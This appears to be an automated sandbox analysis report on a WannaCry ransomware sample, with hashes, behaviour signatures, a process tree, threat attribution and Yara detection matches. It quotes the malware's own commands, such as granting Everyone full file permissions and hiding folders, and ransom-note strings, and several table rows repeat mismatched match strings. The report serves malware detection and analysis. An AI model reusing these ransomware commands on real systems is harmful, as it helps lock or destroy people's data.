Edit tour

Windows Analysis Report
LisectAVT_2403002A_126.EXE.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_126.EXE.exe
Analysis ID:	1482512
MD5:	c98e7230adb1ba8d2f2082ca885068bb
SHA1:	523a6fdf84bc1b0eec54d9532b3dbe564f29af38
SHA256:	6cf41e72620cafb1577415d626dbb66c8c796d7167164ca091a27c4273378a20
Tags:	exeWannaCry
Infos:

Detection

Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Yara detected Wannacry ransomware

AI detected suspicious sample

Command shell drops VBS files

Creates files in the recycle bin to hide itself

Deletes shadow drive data (may be related to ransomware)

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Uses cmd line tools excessively to alter registry or file data

Writes many files with high entropy

Abnormal high CPU Usage

Creates a process in suspended mode (likely to inject code)

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses cacls to modify the permissions of files

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_126.EXE.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe" MD5: C98E7230ADB1BA8D2F2082CA885068BB)

attrib.exe (PID: 7560 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icacls.exe (PID: 7568 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskdl.exe (PID: 7692 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c 70341721944935.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 7780 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)

taskdl.exe (PID: 7752 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7816 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7832 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7848 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7864 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7880 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7932 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7948 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8016 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8044 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8076 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8108 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8124 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8140 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 8172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7244 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7272 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 3168 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 6236 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7152 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7216 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7320 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7404 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 2696 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7044 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7300 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7492 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7556 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

taskdl.exe (PID: 7600 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
LisectAVT_2403002A_126.EXE.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
LisectAVT_2403002A_126.EXE.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
LisectAVT_2403002A_126.EXE.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
LisectAVT_2403002A_126.EXE.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...

Dropped Files

Source	Rule	Description	Author	Strings
C:\@Please_Read_Me@.txt	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\70341721944935.bat	WannCry_BAT	Detects WannaCry Ransomware BATCH File	Florian Roth	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\@WanaDecryptor@.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2c0:$s1: A: Don't worry about decryption. 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\u.wnry	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\u.wnry	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
C:\Users\user\Desktop\r.wnry	WannaCry_RansomNote	Detects WannaCry Ransomware Note	Florian Roth	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
Click to see the 34 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1788283067.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000000.1324912594.000000000040E000.00000008.00000001.01000000.00000003.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000000.00000003.1374099272.0000000000ABF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000000.00000003.1788065356.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: LisectAVT_2403002A_126.EXE.exe PID: 7508	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
